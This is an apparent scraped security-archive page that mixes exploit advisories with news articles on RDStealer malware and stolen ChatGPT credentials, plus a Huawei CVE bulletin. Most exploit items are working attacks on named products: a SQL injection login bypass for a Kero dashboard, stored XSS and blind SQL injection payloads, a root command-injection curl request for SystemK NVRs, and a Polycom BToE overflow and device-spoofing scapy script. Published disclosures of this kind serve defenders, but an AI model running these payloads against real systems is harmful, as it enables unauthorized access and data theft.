WordPress Theme Medic theme version 1.0.0 suffers from having a weak password recovery mechanism for the forgot password flow.

    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password# Dork: inurl:/wp-includes/class-wp-query.php# Date: 2023-06-19# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html# Version: 1.0.0 (REQUIRED)# Tested on: Windows/Linux# CVE: CVE-2020-11027import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedelta# Set the WordPress site URL and the user email addresssite_url = 'https://example.com'user_email = 'user@example.com'# Get the password reset link from the user email# You can use any email client or library to retrieve the email# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'with open('password_reset_email.html', 'r') as f:    email = f.read()    soup = BeautifulSoup(email, 'html.parser')    reset_link = soup.find('a', href=True)['href']    print(f'Reset Link: {reset_link}')# Check if the password reset link expires upon changing the user passwordresponse = requests.get(reset_link)if response.status_code == 200:    # Get the expiration date from the reset link HTML    soup = BeautifulSoup(response.text, 'html.parser')    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')    print(f'Expiration Date: {expiration_date}')    # Check if the expiration date is less than 24 hours from now    if expiration_date < datetime.now() + timedelta(hours=24):        print('Password reset link expires upon changing the user password.')    else:        print('Password reset link does not expire upon changing the user password.')else:    print(f'Error fetching reset link: {response.status_code} {response.text}')    exit()

WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism

WordPress Kero jQuery/HTML Dashboard PRO theme version 2.3.86 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : WordPress - Kero jQuery/HTML Dashboard PRO Auth BY pass Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : https://dashboardpack.com/theme-details/kero-jquery-html-dashboard-pro/                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /panel/sign-in.php[+] User & Pass :  ' or 0=0 #[+] https://127.0.0.1/spdmuniversal.in/panel/sign-in.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

WordPress Kero jQuery/HTML Dashboard PRO 2.3.86 SQL Injection

Student Study Center Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)# Date of found: 12/05/2023# Exploit Author: VIVEK CHOUDHARY @sudovivek# Version: V1.0# Tested on: Windows 10# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/# CVE: CVE-2023-33580# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580Vulnerability Description -    The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.Steps to Reproduce -    The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:            1.  Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.        2.  Click on the "Admin" button to navigate to the admin login page.        3.  Login to the Admin account using the default credentials.                - Username: admin                - Password: Test@123        4.  Proceed to the Admin Profile page.        5.  Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.        6.  Click on the "Submit" button.        7.  Refresh the page, and the injected payload will be executed.As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

Student Study Center Management System 1.0 Cross Site Scripting

The Shop version 2.5 suffers from a remote SQL injection vulnerability.

    # Exploit Title: The Shop v2.5 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/the-shop/34858541# Demo Site: https://shop.activeitzone.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /api/v1/carts/add HTTP/1.1Content-Type: application/jsonAccept: application/json, text/plain, */*x-requested-with: XMLHttpRequestx-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4Referer: https://localhostCookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7Content-Length: 81Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}### Parameter & Payloads ###Parameter: JSON qty ((custom) POST)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)END))","temp_user_id":null}    Type: time-based blind    Title: MySQL > 5.0.12 OR time-based blind (heavy query)    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNSC)","temp_user_id":null}

The Shop 2.5 SQL Injection

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called RDStealer.
"The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News.
Evidence gathered by the Romanian

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called **RDStealer**.

"The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News.

Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia.

In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection.

A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads.

One of the sub-folders in question is "C:\\Program Files\\Dell\\CommandUpdate," which is the directory for a legitimate Dell application called Dell Command | Update.

Bitdefender said all the machines infected over the course of the incident were manufactured by Dell, suggesting that the threat actors deliberately chose this folder to camouflage the malicious activity.

This line of reasoning is bolstered by the fact that the threat actor registered command-and-control (C2) domains such as "dell-a\[.\]ntp-update\[.\]com" with the goal of blending in with the target environment.

The intrusion set is characterized by the use of a server-side backdoor called RDStealer, which specializes in gathering clipboard content and keystroke data from the host.

But what makes it stand out is its capability to "monitor incoming RDP \[Remote Desktop Protocol\] connections and compromise a remote machine if client drive mapping is enabled."

Thus when a new RDP client connection is detected, commands are issued by RDStealer to exfiltrate sensitive data, such as browsing history, credentials, and private keys from apps like mRemoteNG, KeePass, and Google Chrome.

"This highlights the fact that threat actors actively seek credentials and saved connections to other systems," Bitdefender's Marin Zugec said in a second analysis.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

What's more, the connecting RDP clients are infected with another Golang-based custom malware known as Logutil to maintain a persistent foothold on the victim network using DLL side-loading techniques and facilitate command execution.

Not much is known about the threat actor other than the fact that it has been active dating back to at least 2020.

"Cybercriminals continually innovate and explore novel methods to enhance the reliability and stealthiness of their malicious activities," Zugec said.

"This attack serves as a testament to the increasing sophistication of modern cyber attacks, but also underscores the fact that threat actors can leverage their newfound sophistication to exploit older, widely adopted technologies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer

Over 100,000 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials.
The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News.
"The number of

Endpoint Security / Password

Over 100,000 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials.

The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News.

"The number of available logs containing compromised ChatGPT accounts reached a peak of 26,802 in May 2023," the Singapore-headquartered company said. "The Asia-Pacific region has experienced the highest concentration of ChatGPT credentials being offered for sale over the past year."

Other countries with the most number of compromised ChatGPT credentials include Pakistan, Brazil, Vietnam, Egypt, the U.S., France, Morocco, Indonesia, and Bangladesh.

A further analysis has revealed that the majority of logs containing ChatGPT accounts have been breached by the notorious Raccoon info stealer, followed by Vidar and RedLine.

Information stealers have become popular among cybercriminals for their ability to hijack passwords, cookies, credit cards, and other information from browsers, and cryptocurrency wallet extensions.

"Logs containing compromised information harvested by info stealers are actively traded on dark web marketplaces," Group-IB said.

"Additional information about logs available on such markets includes the lists of domains found in the log as well as the information about the IP address of the compromised host."

Typically offered based on a subscription-based pricing model, they have not only lowered the bar for cybercrime, but also serve as a conduit for launching follow-on attacks using the siphoned credentials.

"Many enterprises are integrating ChatGPT into their operational flow," Dmitry Shestakov, head of threat intelligence at Group-IB, said.

"Employees enter classified correspondences or use the bot to optimize proprietary code. Given that ChatGPT's standard configuration retains all conversations, this could inadvertently offer a trove of sensitive intelligence to threat actors if they obtain account credentials."

To mitigate such risks, it's recommended that users follow appropriate password hygiene practices and secure their accounts with two-factor authentication (2FA) to prevent account takeover attacks.

The development comes amid an ongoing malware campaign that's leveraging fake OnlyFans pages and adult content lures to deliver a remote access trojan and an information stealer called DCRat (or DarkCrystal RAT), a modified version of AsyncRAT.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

"In observed instances, victims were lured into downloading ZIP files containing a VBScript loader which is executed manually," eSentire researchers said, noting the activity has been underway since January 2023.

"File naming convention suggests the victims were lured using explicit photos or OnlyFans content for various adult film actresses."

It also follows the discovery of a new VBScript variant of a malware called GuLoader (aka CloudEyE) that employs tax-themed decoys to launch PowerShell scripts capable of retrieving and injecting Remcos RAT into a legitimate Windows process.

"GuLoader is a highly evasive malware loader commonly used to deliver info-stealers and Remote Administration Tools (RATs)," the Canadian cybersecurity company said in a report published earlier this month.

"GuLoader leverages user-initiated scripts or shortcut files to execute multiple rounds of highly obfuscated commands and encrypted shellcode. The result is a memory-resident malware payload operating inside a legitimate Windows process."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces

Vulnerability of spoofing trustlists of Huawei desktop.Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the May 2023 Android security bulletin:

Critical: none

High: CVE-2023-21109, CVE-2023-20914, CVE-2023-21103, CVE-2023-21111, CVE-2023-21118, CVE-2023-21665, CVE-2023-21666, CVE-2022-46891, CVE-2021-0877

Medium: CVE-2023-21116

Low: none

Already included in previous updates: CVE-2023-21085, CVE-2023-20909, CVE-2023-20967, CVE-2023-21080, CVE-2023-21081, CVE-2023-21082, CVE-2023-21083, CVE-2023-21089, CVE-2023-21092, CVE-2023-21094, CVE-2023-21097, CVE-2023-21098, CVE-2023-21099, CVE-2023-20950

※ For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2022-48486: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48487: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48488: Vulnerability of bypassing the default desktop security controls

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause unauthorized modifications to the desktop.

CVE-2022-48489: Configuration defects in the secure OS module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48490: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48491: Vulnerability of missing authentication on certain HUAWEI phones

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability can lead to ads and other windows to display at any time.

CVE-2022-48492: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48493: Configuration defects in the secure OS module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48494: Vulnerability of lax app identity verification in the pre-authorization function

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will cause malicious apps to become pre-authorized.

CVE-2022-48495: Vulnerability of unauthorized access to foreground app information

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause foreground app information to be obtained.

CVE-2022-48496: Vulnerability of lax app identity verification in the pre-authorization function

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will cause malicious apps to become pre-authorized.

CVE-2022-48497: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48498: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48499: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48500: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48501: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2023-34155: Vulnerability of unauthorized calling on HUAWEI phones and tablets

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2023-34156: Vulnerability of services denied by early fingerprint APIs on HarmonyOS products

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause services to be denied.

CVE-2023-34158: Vulnerability of public APIs and methods in WindowManageServices being called by malicious third-party apps

Severity: High

Affected versions: EMUI 13.0.0, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause unauthorized access by third-party apps.

CVE-2023-34159: Improper permission control vulnerability in the Notepad app

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of the vulnerability may lead to privilege escalation, which affects availability and confidentiality.

CVE-2023-34160: Vulnerability of public APIs and methods in WindowManageServices being called by malicious third-party apps

Severity: High

Affected versions: EMUI 13.0.0, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause unauthorized access by third-party apps.

CVE-2023-34161: Inappropriate authorization vulnerability in the SettingsProvider module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause features to perform abnormally.

CVE-2023-34162: Version update determination vulnerability in the user profile module

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may cause repeated HMS Core updates and cause services to fail.

CVE-2023-34163: Permission control vulnerability in the window management module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause features to perform abnormally.

CVE-2023-34164: Improper permission verification vulnerability in the SDK on which the MediaPlaybackController module depends

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1

Impact: Successful exploitation of this vulnerability may affect confidentiality.

CVE-2023-34166: Vulnerability of system restart triggered by abnormal callbacks passed to APIs

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause the system to restart.

CVE-2023-34167: Vulnerability of spoofing trustlists of HUAWEI desktop

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

CVE-2023-34167: June

SystemK NVR 504/508/516 version 2.3.5SK.30084998 suffer from a command injection vulnerability.

    # Exploit Title: SystemK NVR 504/508/516 Command Injection# Exploit Author: Keniver Wang# Publish Date: 19/06/2023# Date of found: 20/01/2021# Vendor: SystemK# Vendor Homepage: https://nvr.bz/# Version: NVR 504/508/516 2.3.5SK.30084998# Greets:    Weber Tsai (CHT Security)# Description    A Command Injection vulnerability in the DDNS Setting that allowsattacker to execute arbitrary commands with root privileges.# Proof of Conceptcurl 'http://<IP>/ddnsserver.cgi?action=test&address=members.dyndns.org&type=dyndns&username=&password=&hostname=;<COMMAND>;&updatetime=300'\  -X 'POST' \  -H 'Connection: keep-alive' \  -H 'Content-Length: 0' \  -H 'Authorization: Basic YWRtaW46YWRtaW4=' \  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)' \  -H 'Accept: */*' \  -H 'Accept-Language: zh-TW,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'

SystemK NVR 504/508/516 Command Injection

Polycom BToE Connector version 4.4.0.0 suffers from remote buffer overflow and man-in-the-middle vulnerabilities.

    Microsoft® Lync™ Better Together over Ethernet (BToE) feature on Polycom® VVX® business media. phones enables you to control phone activity from your computer using your Lync client.The BToE feature enables you to place, answer, and hold audio and video calls from your Polycom VVX phone and your Lync client on your computer.#### Title: Polycom BToE Connector 4.4.0.0 Multiple Vulnerabilities#### Affected versions: 4.4.0.0#### Tested on: Windows 10 Enterprise (x64), Windows 11 Home (x64), PBC.exe (x86)#### Credits: echo1. Remote stack based buffer overflowPolycom BToE Connector in version 4.4.0.0 is prone to Remote Stack Based Buffer Overflow.Vulnerability occurs in handling the following BToE protocol tags:<QoSDSCPValue>, <MediaPort>, <Dtmf>, <SignInState> and is related to the lack of error checking after call strstr function.Value returned by strstr is next used to calculate size of data which will be passed to strncpy.Due to limitation imposed on us by recv function - direct control only over 1024 bytes of data - using this vulnerability to achieve Remote Code Execution is very hard (partial overwrite) or even impossible.0022DB5B | C68424 30020000 00       | mov byte ptr ss:[esp+230],0 |0022DB63 | 68 28D83000              | push pbc.30D828 | 30D828:"</QoSDSCPValue>\n"0022DB68 | 57                       | push edi |0022DB69 | 66:0FD68424 39020000     | movq qword ptr ss:[esp+239],xmm0 |0022DB72 | 83C6 0E                  | add esi,E |0022DB75 | C68424 41020000 00       | mov byte ptr ss:[esp+241],0 |0022DB7D | FF15 F4222E00            | call dword ptr ds:[<&strstr>] |0022DB83 | 8BF8                     | mov edi,eax | <- poiter returned by strstr (no error check!)0022DB85 | 8D8424 38020000          | lea eax,dword ptr ss:[esp+238] |0022DB8C | 2BFE                     | sub edi,esi | <- calculate the size of QoSDSCPValue value0022DB8E | 57                       | push edi |    (null - poiter)0022DB8F | 56                       | push esi |0022DB90 | 50                       | push eax |0022DB91 | FF15 CC242E00            | call dword ptr ds:[<&strncpy>] | <- (buffer overflow)0022DB97 | 83C4 14                  | add esp,14 |:POC:-- <MediaPort><?xml version="1.0" encoding="UTF-8" standalone="yes"?><response protocolVersion="1" requestId="2"><MediaPort>31337</MediaPort>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-- <QoSDSCPValue><?xml version="1.0" encoding="UTF-8" standalone="yes"?><response><QoSDSCPValue>0</QoSDSCPValue>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:CRASH LOG:0:004> g(2d80.336c): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=ff09262c ecx=3fc2421e edx=00000000 esi=00f6dac4 edi=00f6fffdeip=774028e9 esp=00f6d974 ebp=00f6e284 iopl=0         nv up ei pl nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010206ucrtbase!strncpy+0x109:774028e9 8907            mov     dword ptr [edi],eax ds:002b:00f6fffd=????????0:003> g(2d80.336c): Unknown exception - code c00001a5 (!!! second chance !!!)eax=00000000 ebx=ff09262c ecx=3fc2421e edx=00000000 esi=00f6dac4 edi=00f6fffdeip=774028e9 esp=00f6d974 ebp=00f6e284 iopl=0         nv up ei pl nz na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010206ucrtbase!strncpy+0x109:774028e9 8907            mov     dword ptr [edi],eax ds:002b:00f6fffd=????????0:003> kb  # ChildEBP RetAddr  Args to Child00 00f6d97c 002b9942 00f6e248 00f6d9d3 ff09262d ucrtbase!strncpy+0x109WARNING: Stack unwind information not available. Following frames may be wrong.01 00f6e284 41414141 41414141 41414141 41414141 PBC+0x994202 00f6e288 41414141 41414141 41414141 41414141 0x4141414103 00f6e28c 41414141 41414141 41414141 41414141 0x4141414104 00f6e290 41414141 41414141 41414141 41414141 0x4141414105 00f6e294 41414141 41414141 41414141 41414141 0x4141414106 00f6e298 41414141 41414141 41414141 41414141 0x4141414107 00f6e29c 41414141 41414141 41414141 41414141 0x4141414108 00f6e2a0 41414141 41414141 41414141 41414141 0x4141414109 00f6e2a4 41414141 41414141 41414141 41414141 0x414141410a 00f6e2a8 41414141 41414141 41414141 41414141 0x414141410b 00f6e2ac 41414141 41414141 41414141 41414141 0x414141410c 00f6e2b0 41414141 41414141 41414141 41414141 0x414141410d 00f6e2b4 41414141 41414141 41414141 41414141 0x414141410e 00f6e2b8 41414141 41414141 41414141 41414141 0x414141410f 00f6e2bc 41414141 41414141 41414141 41414141 0x4141414110 00f6e2c0 41414141 41414141 41414141 41414141 0x4141414111 00f6e2c4 41414141 41414141 41414141 41414141 0x4141414112 00f6e2c8 41414141 41414141 41414141 41414141 0x4141414113 00f6e2cc 41414141 41414141 41414141 41414141 0x4141414114 00f6e2d0 41414141 41414141 41414141 41414141 0x4141414115 00f6e2d4 41414141 41414141 41414141 41414141 0x4141414116 00f6e2d8 41414141 41414141 41414141 41414141 0x4141414117 00f6e2dc 41414141 41414141 41414141 41414141 0x4141414118 00f6e2e0 41414141 41414141 41414141 41414141 0x4141414119 00f6e2e4 41414141 41414141 41414141 41414141 0x414141411a 00f6e2e8 41414141 41414141 41414141 41414141 0x414141411b 00f6e2ec 41414141 41414141 41414141 41414141 0x414141411c 00f6e2f0 41414141 41414141 41414141 41414141 0x414141411d 00f6e2f4 41414141 41414141 41414141 41414141 0x414141411e 00f6e2f8 41414141 41414141 41414141 41414141 0x414141411f 00f6e2fc 41414141 41414141 41414141 41414141 0x4141414120 00f6e300 41414141 41414141 41414141 41414141 0x4141414121 00f6e304 41414141 41414141 41414141 41414141 0x4141414122 00f6e308 41414141 41414141 41414141 41414141 0x4141414123 00f6e30c 41414141 41414141 41414141 41414141 0x4141414124 00f6e310 41414141 41414141 41414141 41414141 0x4141414125 00f6e314 41414141 41414141 41414141 41414141 0x4141414126 00f6e318 41414141 41414141 41414141 41414141 0x4141414127 00f6e31c 41414141 41414141 41414141 41414141 0x4141414128 00f6e320 41414141 41414141 41414141 41414141 0x4141414129 00f6e324 41414141 41414141 41414141 0000000a 0x414141412a 00f6e328 41414141 41414141 0000000a 00000000 0x414141412b 00f6e32c 41414141 0000000a 00000000 00000000 0x414141412c 00f6e330 00000000 00000000 00000000 00000000 0x414141412. Man in the middle / Device spoofingBToE protocol occurs in two versions, newer and legacy.Implementation of newer version of BToE in BToE Connector is based on openssl library and that version support server authenticityverification. Legacy BToE implementation is relying on plink tool from PuTTY and doesn't check server authenticity while establishing the connection to the server.An attacker which has access to the 2081 UDP port which the PBC.exe is listening on, can - based on the lack of server authenticityverification - send a specially crafted packet and pair system/lync of attacked user with the operating system of attacker choice. From this point, an attacker can intercept or/and modify all data - including phone records and SRTP streams - that are transferred between the attacked system/lync app and the user's phone (polycom device).:POC:[victim system]C:\Windows\System32>hostnamevictimC:\Windows\System32>ipconfigWindows IP ConfigurationWireless LAN adapter Wi-Fi:    Connection-specific DNS Suffix  . : NAT.in.evil.empire    Link-local IPv6 Address . . . . . : 2001:db8:3333:4444:5555:6666:7777:8888    IPv4 Address. . . . . . . . . . . : 192.168.0.11    Subnet Mask . . . . . . . . . . . : 255.255.255.0    Default Gateway . . . . . . . . . : 192.168.0.1C:\Windows\System32>C:\Windows\System32>netstat -p UDP -a -n -bActive Connections   Proto  Local Address          Foreign Address        State   UDP    0.0.0.0:500            *:*   IKEEXT  [svchost.exe]   UDP    0.0.0.0:2081           *:*  [PBC.exe]  ...C:\Windows\System32>[attacker system]echo@attacker:~$ hostnameattackerecho@attacker:~$echo@attacker:~$ ip a...3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000     link/ether 80:91:33:9c:b9:9f brd ff:ff:ff:ff:ff:ff     inet 192.168.0.16/24 brd 192.168.0.255 scope global dynamic noprefixroute wlan0        valid_lft 3404sec preferred_lft 3404sec     inet6 1111::2222:3333:4444:5555/66 scope link noprefixroute        valid_lft forever preferred_lft foreverecho@attacker:~$root@attacker:/home# tail -n 1 /etc/passwdSynergy:x:1001:1001::/home/Synergy:/bin/bash  #pwd = Ch@mp$0FI1Croot@attacker:/home#root@attacker:/home# tail /etc/ssh/sshd_config# Example of overriding settings on a per-user basis#Match User anoncvs#       X11Forwarding no#       AllowTcpForwarding no#       PermitTTY no#       ForceCommand cvs serverAllowUsers Synergyroot@attacker:/home#echo@attacker:~$ cat /home/echo/Pulpit/BTOE/BToEMiTMPoc.py#!/usr/bin/python3import argparse, socketfrom scapy import all as scapydef packet(pbc_ip, pbc_port, phone_ip, phone_port):     fp_ip = phone_ip.split(".");     payload = struct.pack("BBBBHBBBBBBBBBBBBBBBBBBBBB",                           int(fp_ip[0]), int(fp_ip[1]), int(fp_ip[2]), int(fp_ip[3]),                           socket.htons(int(phone_port)),                           0x00, 0x04, 0xF3,5,8,9,10,11,12,1,13,14,15,16,17,18,19,0x1A, 0x1B, 0x1C, 0x1D);     packet = scapy.IP(dst=pbc_ip)/scapy.UDP(dport=pbc_port, sport=scapy.RandShort())/scapy.raw(payload);     scapy.send(packet, verbose=False);def poc():     opt = argparse.ArgumentParser(description='Process some integers.');     opt.add_argument('--pbc_ip', action='store',                      type=str,                      help='PBC.exe IPv4 address', required=True);     opt.add_argument('--pbc_port', action='store', type=int, help='PBC.exe UDP port', required=True);     opt.add_argument('--fake_phone_ip', action='store', type=str, help='Fake phone IPv4 address', required=True);     opt.add_argument('--fake_phone_port', action='store', type=str, help='Fake phone TCP port', required=True);     args = opt.parse_args()     packet(args.pbc_ip, args.pbc_port, args.fake_phone_ip, args.fake_phone_port);if __name__ == "__main__":    poc();echo@attacker:~$echo@attacker:~$ sudo python3 /home/echo/Pulpit/BTOE/BToEMiTMPoc.py --pbc_ip 192.168.0.11 --pbc_port 2081 --fake_phone_ip 192.168.0.16 --fake_phone_port 31337echo@attacker:~$ nc -l -v -p 31337listening on [any] 31337 ...connect to [192.168.0.16] from attacker [192.168.0.16] 59680<?xml version="1.0" encoding="UTF-8" standalone="yes"?><request  protocolVersion="1" requestId="2"><GruuRequest></GruuRequest></request>####:Recommendation:Since there are still no official fixes, I suggest you to consider blocking plink.exe from location "C:\Program Files [(x86)]\Polycom\Polycom BToE Connector"in order to disable legacy BToE support in BToE Connector.####:Disclosure Timeline:20.02.2023 – Initial contact with security@poly.com.22.02.2023 – Sending details to HP.06.03.2023 - HP/Poly plans the work schedule and fixes for product.13.03.2023 – HP/Poly was informed about 90 days disclosure policy.10.05.2023 – Request for status.11.05.2023 – Release is planning on mid-June.13.06.2023 - Request for status.15.06.2023 - Publication.-----BEGIN PGP PUBLIC KEY 